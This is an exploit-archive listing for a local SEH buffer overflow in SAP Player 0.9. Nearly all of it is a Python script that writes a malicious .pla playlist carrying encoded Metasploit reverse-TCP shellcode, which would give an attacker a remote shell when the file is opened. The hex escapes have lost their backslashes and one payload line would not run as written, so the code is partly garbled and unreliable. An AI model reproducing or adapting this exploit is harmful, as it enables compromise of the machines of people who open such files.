SAP Player 0.9 (.pla) Universal Local Buffer Overflow Exploit (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : SAP Player 0.9 (.pla) Universal Local Buffer Overflow Exploit (SEH)
# Published : 2009-09-15
# Author : mr_me
# Previous Title : Protector Plus Antivirus 8/9 Local Privilege Escalation Vulnerability
# Next Title : NetAccess IP3 (ping option) Command Injection Vulnerability (auth)

#!/usr/bin/python
#
###########################################################################################
#
# SAP player 0.9 (.pla) Universal Local BoF Exploit (SEH) 
# Download: http://www.sorinara.com/sap/sap09.exe                  
# Credits go to:  PLATEN
# Coded by: Steven Seeley aka mr_me
# Tested on Windows XP SP3
# Its not dead till its buried  ;) 
# 
############################################################################################
#
# windows/shell/reverse_tcp - 617 bytes (stage 1)
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# LHOST=192.168.0.2, EXITFUNC=seh, LPORT=4444

sc = ("xdaxc8xd9x74x24xf4x5bx53x59x49x49x49x49x49x49"
"x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b"
"x4cx4dx38x50x56x45x50x45x50x43x30x51x43x50x55"
"x46x36x50x57x4cx4bx42x4cx46x44x45x48x4cx4bx47"
"x35x47x4cx4cx4bx50x54x44x45x42x58x45x51x4bx5a"
"x4cx4bx51x5ax44x58x4cx4bx50x5ax47x50x43x31x4a"
"x4bx4bx53x46x52x47x39x4cx4bx47x44x4cx4bx43x31"
"x4ax4ex46x51x4bx4fx4bx4cx50x31x49x50x4ex4cx46"
"x58x4dx30x42x54x44x47x49x51x48x4fx44x4dx43x31"
"x49x57x4ax4bx4cx32x47x4bx43x4cx46x44x45x44x42"
"x55x4bx51x4cx4bx51x4ax47x54x45x51x4ax4bx45x36"
"x4cx4bx44x4cx50x4bx4cx4bx50x5ax45x4cx45x51x4a"
"x4bx4cx4bx45x54x4cx4bx43x31x4bx58x4ax4bx45x52"
"x50x31x49x50x51x4fx51x4ex51x4dx51x4bx49x52x44"
"x48x45x50x51x4ex43x5ax46x50x50x59x45x34x4cx4b"
"x45x49x4cx4bx51x4bx44x4cx4cx4bx51x4bx45x4cx4c"
"x4bx45x4bx4cx4bx51x4bx45x58x51x43x43x58x4cx4e"
"x50x4ex44x4ex4ax4cx4bx4fx48x56x4cx49x48x47x51"
"x43x45x38x51x44x49x5ax4ex4fx4cx51x4bx4fx49x46"
"x4bx31x4ax4cx43x30x45x51x45x50x43x30x50x50x51"
"x47x51x46x51x43x4bx39x4bx55x4ax48x45x4fx43x30"
"x45x50x43x30x4ax30x43x31x43x30x43x30x4ex56x42"
"x39x44x58x4bx57x4ex44x44x59x42x50x4bx59x4ax4c"
"x4cx39x4ex4ax45x30x4ex39x45x59x4bx45x4ex4dx48"
"x4bx4ax4dx4bx4cx47x4bx46x37x50x53x50x32x51x4f"
"x46x53x46x52x43x30x51x4bx4cx4dx50x4bx42x38x46"
"x31x4bx4fx49x47x4cx49x49x4fx4cx49x49x53x4cx4d"
"x43x45x42x34x42x4ax45x55x50x59x50x51x46x33x4b"
"x4fx50x34x4cx4fx4bx4fx51x45x43x34x51x49x4dx59"
"x44x44x4cx4ex4bx52x4cx32x46x4bx51x37x46x34x4b"
"x4fx47x47x4bx4fx51x45x51x38x50x31x49x50x46x30"
"x46x30x46x30x50x50x51x50x46x30x47x30x50x50x4b"
"x4fx51x45x47x54x4dx59x48x47x43x58x49x50x49x38"
"x45x50x43x32x42x48x43x32x43x30x42x31x51x4cx4d"
"x59x4bx51x43x5ax44x50x46x31x51x47x4bx4fx51x45"
"x51x30x42x4ax51x50x51x4ex46x36x49x51x4ax46x44"
"x46x46x36x49x51x4dx36x45x58x50x56x43x5ax43x30"
"x4bx4fx46x35x44x4cx4bx39x48x43x43x5ax43x30x50"
"x56x46x33x51x47x4bx4fx51x45x42x38x4bx4fx4ex33"
"x41x41")

eviL = ("x41" * 35272);
eviL += ("xebx06x90x90") 
eviL += ("x27x4ax01x10") 
eviL += ("x90" * 10)
eviL += (sc)
eviL += ("x43" * 3720 - len(sc) - 10)

print "[+] SAP player 0.9 (.pla) Universal Local BoF Exploit"
print "[+] Creating payload"
file = open('mr_mes_playlist.pla','w');
file.write(eviL);
file.close();
print "[+] pla file created successfully!"

# www.Syue.com [2009-09-15]